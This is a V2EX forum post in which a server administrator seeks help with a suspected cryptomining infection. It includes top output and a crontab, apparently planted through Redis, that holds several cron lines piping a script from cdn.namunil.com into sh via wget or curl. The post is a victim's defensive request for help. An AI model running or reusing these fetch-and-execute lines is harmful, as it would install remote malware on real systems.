最近服务器 CPU 占用一直在 75%左右,阿里云盾报警说是有挖矿程序,但是 top 命令没有发现 cpu 占用特别高的进程
top - 09:08:51 up 7 days, 21:20, 0 users, load average: 6.53, 6.48, 6.45
Tasks: 181 total, 1 running, 179 sleeping, 0 stopped, 1 zombie
Cpu(s): 77.8%us, 6.1%sy, 0.0%ni, 16.1%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 32946868k total, 7645184k used, 25301684k free, 722592k buffers
Swap: 0k total, 0k used, 0k free, 4216620k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22948 root 20 0 616 4 0 R 1 0.0 0:00.46 top
1 root 20 0 117m 5996 3888 S 1 0.0 21:17.74 /sbin/init
1767 root 20 0 130m 16m 12m S 1 0.1 43:42.96 /usr/local/aegis/aegis_client/aegis_10_41/AliYunDun
1117 root 20 0 34336 4736 4200 S 0 0.0 7:24.21 /usr/local/aegis/aegis_update/AliYunDunUpdate
26901 root 20 0 2712m 567m 22m S 0 1.8 35:07.66 /root/apps/jdk1.8.0_121/bin/java -Dproc_namenode -Xmx1000m -Djava.net.preferIPv4Stack=true -Dhadoop.log.dir=/root/hadoop/hadoop-2.7.1/logs -D
1277 root 20 0 23196 2060 1524 S 0 0.0 6:24.72 /usr/local/cloudmonitor/wrapper/bin/./wrapper /usr/local/cloudmonitor/wrapper/bin/../conf/wrapper.conf wrapper.syslog.ident=cloudmonitor wrap
7741 root 20 0 6130m 950m 29m S 0 3.0 69:27.14 /root/apps/jdk1.8.0_121/bin/java -cp /root/spark/spark-2.1.4.19-bin-2.7.1/conf/:/root/spark/spark-2.1.4.19-bin-2.7.1/jars/*:/root/hadoop/hado
42 root RT 0 0 0 0 S 0 0.0 3:36.15 [migration/7]
13 root 20 0 0 0 0 S 0 0.0 4:13.37 [ksoftirqd/1]
12 root RT 0 0 0 0 S 0 0.0 3:42.04 [migration/1]
15 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/1:0H]
16 root RT 0 0 0 0 S 0 0.0 0:01.70 [watchdog/2]
17 root RT 0 0 0 0 S 0 0.0 2:07.48 [migration/2]
9 root RT 0 0 0 0 S 0 0.0 1:57.28 [migration/0]
20 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/2:0H]
21 root RT 0 0 0 0 S 0 0.0 0:01.97 [watchdog/3]
22 root RT 0 0 0 0 S 0 0.0 6:07.52 [migration/3]
23 root 20 0 0 0 0 S 0 0.0 5:42.32 [ksoftirqd/3]
25 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/3:0H]
26 root RT 0 0 0 0 S 0 0.0 0:02.08 [watchdog/4]
27 root RT 0 0 0 0 S 0 0.0 1:52.24 [migration/4]
28 root 20 0 0 0 0 S 0 0.0 3:41.09 [ksoftirqd/4]
30 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/4:0H]
8 root 20 0 0 0 0 S 0 0.0 0:00.00 [rcu_bh]
10 root RT 0 0 0 0 S 0 0.0 0:02.24 [watchdog/0]
33 root 20 0 0 0 0 S 0 0.0 4:11.14 [ksoftirqd/5]
32 root RT 0 0 0 0 S 0 0.0 3:36.46 [migration/5]
36 root RT 0 0 0 0 S 0 0.0 0:02.05 [watchdog/6]
35 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/5:0H]
38 root 20 0 0 0 0 S 0 0.0 3:39.25 [ksoftirqd/6]
40 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/6:0H]
41 root RT 0 0 0 0 S 0 0.0 0:01.97 [watchdog/7]
37 root RT 0 0 0 0 S 0 0.0 1:52.30 [migration/6]
43 root 20 0 0 0 0 S 0 0.0 4:06.41 [ksoftirqd/7]
45 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/7:0H]
46 root 20 0 0 0 0 S 0 0.0 0:00.00 [kdevtmpfs]
47 root 0 -20 0 0 0 S 0 0.0 0:00.00 [netns]
48 root 0 -20 0 0 0 S 0 0.0 0:00.00 [perf]
然后,在 /var/spool/crontab 目录下发现一个定时脚本:
REDIS0007ú redis-ver^F3.2.11ú
redis-bitsÀ@ú^EctimeÂI{»Zú^Hused-memÂxÖ^L^@þ^@û^D^@^@^HJsDhtGeK@I
*/5 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh
^@^HFQysiMRk4
*/2 * * * * curl http://cdn.namunil.com/sh.php|sh
^@^FdseINi8
*/2 * * * * wget -O- http://cdn.namunil.com/sh.php|sh
^@^HJPYAqMif@F
*/5 * * * * /usr/bin/curl -qs http://cdn.namunil.com/sh.php|/bin/sh
ÿÖX*µTAÄg
是挖矿的脚本无疑了,但接下来应该怎么排查呢,试了一下挖矿脚本下载不下来。cpu 还是一直 75%左右。
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.